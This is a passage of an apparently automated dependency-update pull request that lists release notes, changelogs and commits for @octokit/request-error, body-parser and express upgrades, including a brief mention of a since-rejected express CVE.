href=\"https://redirect.github.com/octokit/request.js/issues/781\"\u003e#781\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e\u003ccode\u003e1aeac56\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request.js/compare/v5.6.3...v10.0.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for \u003ccode\u003e@​octokit/request\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request-error` from 2.1.0 to 7.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request-error.js/releases\"\u003e\u003ccode\u003e@​octokit/request-error\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.2...v7.1.0\"\u003e7.1.0\u003c/a\u003e (2025-11-13)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003einherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e property (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/535\"\u003e#535\u003c/a\u003e/\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/536\"\u003e#536\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e2ea2780\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.1...v7.0.2\"\u003e7.0.2\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003ee5a75ef\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.0...v7.0.1\"\u003e7.0.1\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/522\"\u003e#522\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/4a453f21afbde9fc19d779518cb8e5f23d05038f\"\u003e4a453f2\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.8...v7.0.0\"\u003e7.0.0\u003c/a\u003e (2025-05-20)\u003c/h1\u003e\n\u003ch3\u003eContinuous Integration\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003estop testing against NodeJS v18 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/512\"\u003e#512\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/8eee0c1eff4f247b714da5db9437787507e124df\"\u003e8eee0c1\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eDrop support for NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ebuild: set minimal node version in build script to v20\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eci: stop testing against NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.7...v6.1.8\"\u003e6.1.8\u003c/a\u003e (2025-04-10)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v14 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/505\"\u003e#505\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/ab4ea7b81bd8055060bfafa47b7eb13d89c7e475\"\u003eab4ea7b\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.7\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e\u003ccode\u003e2ea2780\u003c/code\u003e\u003c/a\u003e feat: inherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/ac7b3094475260d5bc95951d2040e38da8e88dd8\"\u003e\u003ccode\u003eac7b309\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/531\"\u003e#531\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/dadc76ddc454c475f07525a8cd96fc29e4353cb1\"\u003e\u003ccode\u003edadc76d\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/525\"\u003e#525\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/f57f2e6b6fdc3578c3484c8939bcf56548b620eb\"\u003e\u003ccode\u003ef57f2e6\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/534\"\u003e#534\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003e\u003ccode\u003ee5a75ef\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5d5de21540843d46e1dbd15696af8bdff9cf400\"\u003e\u003ccode\u003ee5d5de2\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/532\"\u003e#532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/8cc127bf725e581cdd32336669d322632e4392b4\"\u003e\u003ccode\u003e8cc127b\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v6 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/b3a876bc68c0d044bf52eeaa513760e362d426e8\"\u003e\u003ccode\u003eb3a876b\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/527\"\u003e#527\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/cf1817b2c1bd15ffbf26bbf4390aa07084a10fce\"\u003e\u003ccode\u003ecf1817b\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/528\"\u003e#528\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/61f1e8750fa8c1b7b57f4323ab13b92bb1017cf2\"\u003e\u003ccode\u003e61f1e87\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency tinybench to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/519\"\u003e#519\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request-error.js/compare/v2.1.0...v7.1.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nRemoves `@tootallnate/once`\n\nUpdates `body-parser` from 1.19.0 to 1.20.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/body-parser/releases\"\u003ebody-parser's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e1.20.4\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRemove redundant depth check by \u003ca href=\"https://github.com/blakeembrey\"\u003e\u003ccode\u003e@​blakeembrey\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/538\"\u003eexpressjs/body-parser#538\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add support for Node.js v23 by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/553\"\u003eexpressjs/body-parser#553\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: restore CI for 1.x branch by \u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/665\"\u003eexpressjs/body-parser#665\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: qs@^6.14.0 by \u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/664\"\u003eexpressjs/body-parser#664\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation and update certain dependencies by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/668\"\u003eexpressjs/body-parser#668\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: remove SECURITY.md by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/669\"\u003eexpressjs/body-parser#669\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add CodeQL (SAST) by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/670\"\u003eexpressjs/body-parser#670\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 1.20.4 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/672\"\u003eexpressjs/body-parser#672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/body-parser/compare/1.20.3...1.20.4\"\u003ehttps://github.com/expressjs/body-parser/compare/1.20.3...1.20.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e1.20.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eImportant\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edeps: qs@6.13.0\u003c/li\u003e\n\u003cli\u003eadd \u003ccode\u003edepth\u003c/code\u003e option to customize the depth level in the parser\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eIMPORTANT:\u003c/strong\u003e The default \u003ccode\u003edepth\u003c/code\u003e level for parsing URL-encoded data is now \u003ccode\u003e32\u003c/code\u003e (previously was \u003ccode\u003eInfinity\u003c/code\u003e). \u003ca href=\"https://github.com/expressjs/body-parser/blob/17529513673e39ba79886a7ce3363320cf1c0c50/README.md#depth\"\u003eDocumentation\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003echore: add support for OSSF scorecard reporting by \u003ca href=\"https://github.com/inigomarquinez\"\u003e\u003ccode\u003e@​inigomarquinez\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/522\"\u003eexpressjs/body-parser#522\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: fix errors in ci github action for node 8 and 9 by \u003ca href=\"https://github.com/inigomarquinez\"\u003e\u003ccode\u003e@​inigomarquinez\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/523\"\u003eexpressjs/body-parser#523\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: pin to node@22.4.1 by \u003ca href=\"https://github.com/wesleytodd\"\u003e\u003ccode\u003e@​wesleytodd\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/527\"\u003eexpressjs/body-parser#527\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: qs@6.12.3 by \u003ca href=\"https://github.com/melikhov-dev\"\u003e\u003ccode\u003e@​melikhov-dev\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/521\"\u003eexpressjs/body-parser#521\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd OSSF Scorecard badge by \u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/531\"\u003eexpressjs/body-parser#531\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eLinter by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/534\"\u003eexpressjs/body-parser#534\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 1.20.3 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/535\"\u003eexpressjs/body-parser#535\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/inigomarquinez\"\u003e\u003ccode\u003e@​inigomarquinez\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/522\"\u003eexpressjs/body-parser#522\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/melikhov-dev\"\u003e\u003ccode\u003e@​melikhov-dev\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/521\"\u003eexpressjs/body-parser#521\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/531\"\u003eexpressjs/body-parser#531\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/expressjs/body-parser/pull/534\"\u003eexpressjs/body-parser#534\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/body-parser/compare/1.20.2...1.20.3\"\u003ehttps://github.com/expressjs/body-parser/compare/1.20.2...1.20.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e1.20.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix strict json error message on Node.js 19+\u003c/li\u003e\n\u003cli\u003edeps: content-type@~1.0.5\n\u003cul\u003e\n\u003cli\u003eperf: skip value escaping when unnecessary\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: raw-body@2.5.2\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.20.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003edeps: qs@6.11.0\u003c/li\u003e\n\u003cli\u003eperf: remove unnecessary object clone\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/body-parser/blob/master/HISTORY.md\"\u003ebody-parser's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.20.4 / 2025-12-01\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: qs@~6.14.0\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation for dependencies\u003c/li\u003e\n\u003cli\u003edeps: http-errors@~2.0.1\u003c/li\u003e\n\u003cli\u003edeps: raw-body@~2.5.3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.20.3 / 2024-09-10\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: qs@6.13.0\u003c/li\u003e\n\u003cli\u003eadd \u003ccode\u003edepth\u003c/code\u003e option to customize the depth level in the parser\u003c/li\u003e\n\u003cli\u003eIMPORTANT: The default \u003ccode\u003edepth\u003c/code\u003e level for parsing URL-encoded data is now \u003ccode\u003e32\u003c/code\u003e (previously was \u003ccode\u003eInfinity\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.20.2 / 2023-02-21\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix strict json error message on Node.js 19+\u003c/li\u003e\n\u003cli\u003edeps: content-type@~1.0.5\n\u003cul\u003e\n\u003cli\u003eperf: skip value escaping when unnecessary\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: raw-body@2.5.2\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.20.1 / 2022-10-06\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: qs@6.11.0\u003c/li\u003e\n\u003cli\u003eperf: remove unnecessary object clone\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.20.0 / 2022-04-02\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix error message for json parse whitespace in \u003ccode\u003estrict\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix internal error when inflated body exceeds limit\u003c/li\u003e\n\u003cli\u003ePrevent loss of async hooks context\u003c/li\u003e\n\u003cli\u003ePrevent hanging when request already read\u003c/li\u003e\n\u003cli\u003edeps: depd@2.0.0\n\u003cul\u003e\n\u003cli\u003eReplace internal \u003ccode\u003eeval\u003c/code\u003e usage with \u003ccode\u003eFunction\u003c/code\u003e constructor\u003c/li\u003e\n\u003cli\u003eUse instance methods on \u003ccode\u003eprocess\u003c/code\u003e to check for listeners\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: http-errors@2.0.0\n\u003cul\u003e\n\u003cli\u003edeps: depd@2.0.0\u003c/li\u003e\n\u003cli\u003edeps: statuses@2.0.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: on-finished@2.4.1\u003c/li\u003e\n\u003cli\u003edeps: qs@6.10.3\u003c/li\u003e\n\u003cli\u003edeps: raw-body@2.5.1\n\u003cul\u003e\n\u003cli\u003edeps: http-errors@2.0.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.19.2 / 2022-02-15\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/7db202cac84a001e6566c2dc6516b44db98beff3\"\u003e\u003ccode\u003e7db202c\u003c/code\u003e\u003c/a\u003e 1.20.4 (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/672\"\u003e#672\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/d8f8adb898676dfdf997b4455e5f9b689b53e989\"\u003e\u003ccode\u003ed8f8adb\u003c/code\u003e\u003c/a\u003e ci: add CodeQL (SAST) (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/670\"\u003e#670\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/6d133c19b3e7c0bb8301959ca1dba283d23d23c3\"\u003e\u003ccode\u003e6d133c1\u003c/code\u003e\u003c/a\u003e chore: remove SECURITY.md (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/669\"\u003e#669\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/fcd15355041ada6f37288dd13858d50429016b66\"\u003e\u003ccode\u003efcd1535\u003c/code\u003e\u003c/a\u003e deps: use tilde notation and update certain dependencies (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/668\"\u003e#668\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/ec5fa290d25d85e0049757e240249072331eaee6\"\u003e\u003ccode\u003eec5fa29\u003c/code\u003e\u003c/a\u003e deps: qs@~6.14.0 (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/664\"\u003e#664\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/ffb95c12c7785ec6d3852ce46b8711ac74009252\"\u003e\u003ccode\u003effb95c1\u003c/code\u003e\u003c/a\u003e ci: restore CI for 1.x branch (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/665\"\u003e#665\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/48a5f074a4db07066087ed8b6ff641825c9c03cf\"\u003e\u003ccode\u003e48a5f07\u003c/code\u003e\u003c/a\u003e ci: add support for Node.js v23 (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/553\"\u003e#553\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/f20f6adc7118cbf973e927d34bc0bbf2ff177459\"\u003e\u003ccode\u003ef20f6ad\u003c/code\u003e\u003c/a\u003e Remove redundant depth check (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/538\"\u003e#538\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/17529513673e39ba79886a7ce3363320cf1c0c50\"\u003e\u003ccode\u003e1752951\u003c/code\u003e\u003c/a\u003e 1.20.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/body-parser/commit/39744cfe2ac4fb37a19ed7c43e3a74332f428e17\"\u003e\u003ccode\u003e39744cf\u003c/code\u003e\u003c/a\u003e chore: linter (\u003ca href=\"https://redirect.github.com/expressjs/body-parser/issues/534\"\u003e#534\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/expressjs/body-parser/compare/1.19.0...1.20.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~ulisesgascon\"\u003eulisesgascon\u003c/a\u003e, a new releaser for body-parser since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `express` from 4.17.1 to 4.22.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/express/releases\"\u003eexpress's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.22.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!IMPORTANT]\u003cbr /\u003e\nThe prior release (4.22.0) included an erroneous breaking change related to the extended query parser. There is no actual security vulnerability associated with this behavior (CVE-2024-51999 has been rejected). The change has been fully reverted in this release.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cul\u003e\n\u003cli\u003eRelease: 4.22.1 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6934\"\u003eexpressjs/express#6934\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.22.0...v4.22.1\"\u003ehttps://github.com/expressjs/express/compare/4.22.0...v4.22.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.22.0\u003c/h2\u003e\n\u003ch2\u003eImportant: Security\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRefactor: improve readability by \u003ca href=\"https://github.com/sazk07\"\u003e\u003ccode\u003e@​sazk07\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6190\"\u003eexpressjs/express#6190\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add support for Node.js@23.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6080\"\u003eexpressjs/express#6080\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMethod functions with no path should error by \u003ca href=\"https://github.com/wesleytodd\"\u003e\u003ccode\u003e@​wesleytodd\u003c/code\u003e\u003c/a\u003e in \u003ca 